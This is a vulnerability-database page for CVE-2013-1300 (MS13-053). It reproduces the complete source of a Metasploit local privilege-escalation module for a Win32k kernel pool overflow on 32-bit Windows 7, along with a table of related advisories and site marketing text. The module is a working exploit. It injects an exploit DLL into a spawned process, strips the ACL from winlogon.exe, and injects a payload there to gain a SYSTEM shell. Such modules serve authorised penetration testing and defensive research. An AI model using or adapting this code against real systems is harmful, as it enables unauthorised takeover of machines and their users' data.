Lucene search
+L

Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

🗓️ 01 Dec 2013 00:00:00Reported by Nils, Jon, Donato Capitella <[email protected]>, Ben Campbell <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 86 Views

Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) vulnerability for local privilege escalation in Windows 7 SP0/SP

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
MS13-053 Win32k Memory Allocation Vulnerability
12 Sep 201300:00
zdt
zdt
zdt
Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
6 May 201400:00
zdt
githubexploit
GithubExploit
Exploit for CVE-2013-1300
9 Sep 201314:20
githubexploit
circl
Circl
CVE-2013-1300
6 May 201400:00
circl
cve
CVE
CVE-2013-1300
10 Jul 201301:00
cve
cvelist
Cvelist
CVE-2013-1300
10 Jul 201301:00
cvelist
exploitdb
Exploit DB
Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)
6 May 201400:00
exploitdb
kitploit
Kitploit
cve-2013-1300
26 Aug 202623:12
kitploit
nvd
NVD
CVE-2013-1300
10 Jul 201303:46
nvd
openvas
OpenVAS
Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2850851)
10 Jul 201300:00
openvas
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)',
          'Description' => %q{
            This module leverages a kernel pool overflow in Win32k which allows local privilege escalation.
            The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).
            This allows any unprivileged process to freely migrate to winlogon.exe, achieving
            privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox.
            NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Nils', # Original Exploit
            'Jon', # Original Exploit
            'Donato Capitella <donato.capitella[at]mwrinfosecurity.com>', # Metasploit Conversion
            'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' # Help and Encouragement ;)
          ],
          'Arch' => ARCH_X86,
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' => {
            'EXITFUNC' => 'thread'
          },
          'Targets' => [
            [ 'Windows 7 SP0/SP1', {} ]
          ],
          'Payload' => {
            'Space' => 4096,
            'DisableNops' => true
          },
          'References' => [
            [ 'CVE', '2013-1300' ],
            [ 'MSB', 'MS13-053' ],
            [ 'URL', 'https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/' ]
          ],
          'DisclosureDate' => '2013-12-01',
          'DefaultTarget' => 0,
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                stdapi_railgun_api
                stdapi_sys_process_attach
                stdapi_sys_process_get_processes
                stdapi_sys_process_thread_create
              ]
            }
          },
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )
  end

  def check
    unless session.platform == 'windows'
      return Exploit::CheckCode::Safe('Target is not vulnerable')
    end

    file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

    case build
    when 7600
      return Exploit::CheckCode::Appears("Revision #{revision} appears vulnerable")
    when 7601
      if branch == 18
        return Exploit::CheckCode::Appears("Revision #{revision} appears vulnerable") if revision < 18176
      elsif revision < 22348
        return Exploit::CheckCode::Appears("Revision #{revision} appears vulnerable")
      end
    end
    return Exploit::CheckCode::Safe("Revision #{revision} is not vulnerable")
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo['Architecture'] == ARCH_X64
      fail_with(Failure::NoTarget, 'Running against 64-bit systems is not supported')
    end

    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system')
    end

    print_status('Launching notepad to host the exploit...')
    notepad_process_pid = cmd_exec_get_pid('notepad.exe')
    begin
      process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      print_error('Operation failed. Hosting exploit in the current process...')
      process = client.sys.process.open
    end

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-1300', 'schlamperei.x86.dll')
    library_path = ::File.expand_path(library_path)

    print_status("Injecting exploit into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)

    thread = process.thread.create(exploit_mem + offset)
    client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000)

    client.sys.process.each_process do |p|
      next unless p['name'] == 'winlogon.exe'

      winlogon_pid = p['pid']
      print_status("Found winlogon.exe with PID #{winlogon_pid}")

      if execute_shellcode(payload.encoded, nil, winlogon_pid)
        print_good('Everything seems to have worked, cross your fingers and wait for a SYSTEM shell')
      else
        print_error('Failed to start payload thread')
      end

      break
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Dec 2013 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 27.2
EPSS0.1218
86